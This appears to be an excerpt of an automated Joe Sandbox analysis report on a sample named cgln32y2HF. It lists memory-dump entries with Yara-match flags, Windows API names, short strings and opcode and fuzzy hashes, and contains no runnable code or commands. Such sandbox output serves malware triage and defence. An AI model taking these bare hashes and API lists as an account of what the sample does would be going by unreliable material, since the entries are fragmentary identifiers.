                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleName
                                                          • String ID:
                                                          • API String ID: 2106025501-0
                                                          • Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                          • Instruction ID: 0f79836f08216e1067b19f7748282cd10e66abfb9a44897a3127195f29ea1e18
                                                          • Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                          • Instruction Fuzzy Hash: 97F0A071201130BBD2349B2AEC4CF57BF6CEF86B70F014215FB19AB2A0D2789812C6D5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: =`f\
                                                          • API String ID: 4218353326-984147390
                                                          • Opcode ID: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                          • Instruction ID: 937e01e95affed1bb86c4fb585bebd6cec6f4652e38a753aecbb8c34d3dca93f
                                                          • Opcode Fuzzy Hash: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                          • Instruction Fuzzy Hash: E5822671508301AFDB14CF19C880AABBBE1FF88344F04892EF99987391D779D995CB96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3333$UUUU$UUUU
                                                          • API String ID: 0-1588839328
                                                          • Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                          • Instruction ID: db216e20b05cf36e7dbad7cd7ff9f755db6c04a52abf1afa55db9664f95289aa
                                                          • Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                          • Instruction Fuzzy Hash: 31419FB1610704CBCB588F19C88479277E6ABD8320F5981AADD058F38AE7B9CCC5CBC4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                          • Instruction ID: d31693203e36b13fa643c34ed7d2e873ec4fc83637a871ea5abd7a03a4c8c85c
                                                          • Opcode Fuzzy Hash: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                          • Instruction Fuzzy Hash: 59F14071E012199FDF14CFA9C8806AEB7B1FF89314F15826EE915A7390DB34AD41CB94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                          • Instruction ID: 1e792c585b5fe79a443a32508fc7ec313994002ffb062f60f55b147da630af66
                                                          • Opcode Fuzzy Hash: 2d3e44d6773cb73d3f78f22b7e789175b054aa5dae3e35d0fed3e7c06545acc3
                                                          • Instruction Fuzzy Hash: 05F15E71E012199FDF24CFA9C884AADF7B1FF88324F15826AD915AB380D734A901DF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: y_B>$y_B>
                                                          • API String ID: 0-2639510964
                                                          • Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                          • Instruction ID: c217e240e4de63698dbdc007ec6427f3aed3e10ff69f5bbbebf730a7c1cd9681
                                                          • Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                          • Instruction Fuzzy Hash: B5328371D0011A8BDF249A9889916BFB670EF58320F24792BD515FB390D73C9E428BDA
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D61E
                                                            • Part of subcall function 0044C5A0: _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                            • Part of subcall function 0044C5A0: __FindPESection.LIBCMT ref: 0044C6D1
                                                          • _CallDestructExceptionObject.LIBVCRUNTIME ref: 0043D6A0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record
                                                          • String ID:
                                                          • API String ID: 4086067019-0
                                                          • Opcode ID: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                          • Instruction ID: d36a7cbcb2159855d2e740cbd3865162507ac70638f688864eb4f2737716b515
                                                          • Opcode Fuzzy Hash: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                          • Instruction Fuzzy Hash: BC21FC72D01204ABDB14EF69DCC19ABBBA5FF48314F098069ED198B246E734F915CBE4
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00418E08,FFFFFFF9,?,?,?,?,00418E08,00000000), ref: 00446164
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446183
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1518329722-0
                                                          • Opcode ID: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                          • Instruction ID: 61ae58f5a109cdc23c8a561ccb435e29d9a033fb164f50c0495edfbe46b21ef4
                                                          • Opcode Fuzzy Hash: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                          • Instruction Fuzzy Hash: 00F0F4B1B001147B6B24DF2D880489FBEE9EAC6364726825BE809D3345E574DD05C295
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LK$Y[
                                                          • API String ID: 0-3215990068
                                                          • Opcode ID: e0129d6195a4faf04e5467944263a4367aaf707841d60a9d02f48df6a373b069
                                                          • Instruction ID: 2e19718e745c83073bb1607c6aa0d0b3959b9da5163b503e513578b3a7fa4beb
                                                          • Opcode Fuzzy Hash: e0129d6195a4faf04e5467944263a4367aaf707841d60a9d02f48df6a373b069
                                                          • Instruction Fuzzy Hash: 46E19DB2904215CBDB259F58C49426DFBF7AF84318F25892EE499DB790D3748B80CB53
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0045D0B5,?,?,00000008,?,?,0045CC90,00000000), ref: 0045D387
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction ID: 2e63c45fd147d1bc419a1cf421641fdd954adc511095b72776a1a782a704c190
                                                          • Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
                                                          • Instruction Fuzzy Hash: EBB15E31A10605CFD724CF28C486B657BA0FF45366F258699EC99CF3A2C339E986CB45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: y_B>
                                                          • API String ID: 0-1404922283
                                                          • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                          • Instruction ID: 4c2ea87e6ed6cce11d3262b2c37c8ab9346d24596443f962e79d9f7238e8cba2
                                                          • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                          • Instruction Fuzzy Hash: E11241B170D361CBDB249F18E49153EBAE4AB94310FA54A5FE0C9CB364D678D8C19B0B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction ID: 318bea0468e25d50bc193c40de4e6b6217f0263c2ba9fd996b50af1c70fb3ca8
                                                          • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction Fuzzy Hash: AE121370608740DFD724CF19C980BABBBE2FBC8304F54892EE58987350D779E9858B96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction ID: a07ba8b594ba98883bec131c9e9a088c46f5a60eb019b747f14f3bd37d244c96
                                                          • Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
                                                          • Instruction Fuzzy Hash: 7E120170A083419FD764CF19C884B2BBBE6BF98308F84896DF58987251DB75E948CF52
                                                          APIs
                                                            • Part of subcall function 00450330: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                          • FindClose.KERNEL32(00000000), ref: 004520F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$AllocateCloseFirstHeapNext
                                                          • String ID:
                                                          • API String ID: 2963102669-0
                                                          • Opcode ID: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
                                                          • Instruction ID: f7a7cccc38e2a98a3a0fd08442e24a40366e03b93faff9898a26c82b853a1aca
                                                          • Opcode Fuzzy Hash: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
                                                          • Instruction Fuzzy Hash: 59413A726002096FDB14AF69DC85EBFB36AEF81319F14416BFD0597282EB789D08C658
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043D0CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                          • Instruction ID: 4f8493139679013ee20e08bfcd7abab68794bcc2040eb7ee6f469f72a5842b4a
                                                          • Opcode Fuzzy Hash: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
                                                          • Instruction Fuzzy Hash: E55106B1E002058FEB14CF55E8857ABBBF5FB48310F24947AD415EB354E3B8A980CB99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                          • Instruction ID: 722ab9fffa63a2ef7d1a063d6d10cc189525accf299069018822edd1fef34131
                                                          • Opcode Fuzzy Hash: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
                                                          • Instruction Fuzzy Hash: 74E125702083419FD724CF19C584BABB7E1BFC8354F05892EF59987250E778E989CB9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                          • Instruction ID: 8f191f8c23af4ff874e44819f72c4410366377a4132184dcb064a70586bdf8c7
                                                          • Opcode Fuzzy Hash: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
                                                          • Instruction Fuzzy Hash: 57C1CF76A006468FDF38CF68C48077EB7F6AF05318F144629D8DA9BA91C738E946CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: VUUU
                                                          • API String ID: 0-2040033107
                                                          • Opcode ID: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                          • Instruction ID: 8f7341bf09dd7d88668ef3d11c74458aa2ddba69b727948ac3827fc30a91a2a0
                                                          • Opcode Fuzzy Hash: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                          • Instruction Fuzzy Hash: 29C1A7756183019BDB1C8A19C59153EBBE5AB85314F24C93FE15ADB3F4E23CD8419B0B
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryVirtual
                                                          • String ID:
                                                          • API String ID: 1804819252-0
                                                          • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction ID: bb654dc0c729bd842e55c2d84f7a994ffa3bbf5d7aaa00ddc59bb9740fabb160
                                                          • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction Fuzzy Hash: C21182731102214BC720DF48CDC0AA773AAFB89718766026AD9445B711D17AECC7C7E4
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0234FBEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryVirtual
                                                          • String ID:
                                                          • API String ID: 1804819252-0
                                                          • Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction ID: ed0022786d00df90f2596bde09403202338bd6242bdd769f7c119627dc73cdef
                                                          • Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
                                                          • Instruction Fuzzy Hash: 3C112B325002614BC720CE48DDC096A73EAEB8971C76902D9DD455BE01D676FD86C7E0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DestroyHeap
                                                          • String ID:
                                                          • API String ID: 2435110975-0
                                                          • Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                          • Instruction ID: 327f04a744b5650a880c0d17b4fb38287b6591765f983e0adcdd5822482b62ae
                                                          • Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                          • Instruction Fuzzy Hash: D1119EB1900B848FD321CF69D845B9AFBF4FB49710F04C62AE8A897740D3786809CFA1
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003CFB3,0043C903), ref: 0043CE8E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                          • Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
                                                          • Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
                                                          • Instruction Fuzzy Hash:
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                          • Instruction ID: 920c4e3f9504e8d2d4b163527b25bc307261b88a0300f18b1f19330db72b497f
                                                          • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                          • Instruction Fuzzy Hash: BF91D67D61C3018BDB249B5A84856BEBBE1BF85710F144C1FE9A9CB390D238D8C19B1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                          • Instruction ID: b4bf6b1535a8192db109e4eceafa1359732031e4ea1743c163b6d2ec44044536
                                                          • Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                          • Instruction Fuzzy Hash: 5762A1316087418FC715DF29C180AAAB7F1FF88304F14896EE4CA9B351D779E996CB4A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4bec0ca96d7979bb9874ea500f13f7931d97d16c0c4a5bc8c4a6a2c06eb0bd8
                                                          • Instruction ID: 0a973efaa9903140cc486945bb1382a86dc342ddc411804bb8bf5106602af095
                                                          • Opcode Fuzzy Hash: c4bec0ca96d7979bb9874ea500f13f7931d97d16c0c4a5bc8c4a6a2c06eb0bd8
                                                          • Instruction Fuzzy Hash: 7312EAB1D0032E4BDF289A58C885DBE7675EB00618F242D27DC1DFA2A1E728C645CBD7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
                                                          • Instruction ID: c832cbe4cea19542036e1dfb563506aac7cc4c9f85c134abf1f95b4790773896
                                                          • Opcode Fuzzy Hash: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
                                                          • Instruction Fuzzy Hash: 301280B19087408FC324DF28C5816ABB7E2FF95314F144A2ED5D687B91E739E485CB4A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
                                                          • Instruction ID: 00b37b14bcf7e53a0711464c53c4ad7664543ad39541697e4ede5dfa319fd604
                                                          • Opcode Fuzzy Hash: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
                                                          • Instruction Fuzzy Hash: EB124A75A087059FC714CF29C5806AAFBE1FF88304F14892EE899D7351D778E895CB8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                          • Instruction ID: 1eafb42da30f8327f2d2cf6283e90da06f622b94c7179535a6af078cda6ee9ef
                                                          • Opcode Fuzzy Hash: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
                                                          • Instruction Fuzzy Hash: 55123775A087059FC314CF29C48066AFBE1FF88314F058A6EF899A7352DB74E955CB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                          • Instruction ID: 9c48d330d68db8a76f352aed59f264cc12ac867535c25307469f3d273e047ffe
                                                          • Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
                                                          • Instruction Fuzzy Hash: 54F128B1E002098BDF288AA989915BFB6B1AF54310F25493FE015FF3D1E27D89458B5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
                                                          • Instruction ID: a0aa4bf3e4d537a92ce93f9e726837fc264071e7a9162c3afbdc2585123e9ce0
                                                          • Opcode Fuzzy Hash: ef9f447ad74e91192cc3b01f303eb7ca3dc5ec1d29bfe9c2e6f9fbdfa1b176fd
                                                          • Instruction Fuzzy Hash: 70021270510B508FC338CF29C6905AABBF1BF45711B944A2EDAA787B90D739F985CB18
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction ID: b31777eaf4445a5ca230d2489b0392e25bee96f51372df8947d9b7d5b3c35a4e
                                                          • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction Fuzzy Hash: FAE1D179A083168FC714CF19C4D06AAB3E2BF99710F55892EED9587381D339E8868B85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction ID: d371015dc2dd78ddfbec78816612abde45ee281d3e1f378e28cdae1071fe03e7
                                                          • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                          • Instruction Fuzzy Hash: 15E1BC75B083168FC714CF18C4D066AB7E2FB88714F5989ADE9D58B381DB39E846CB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
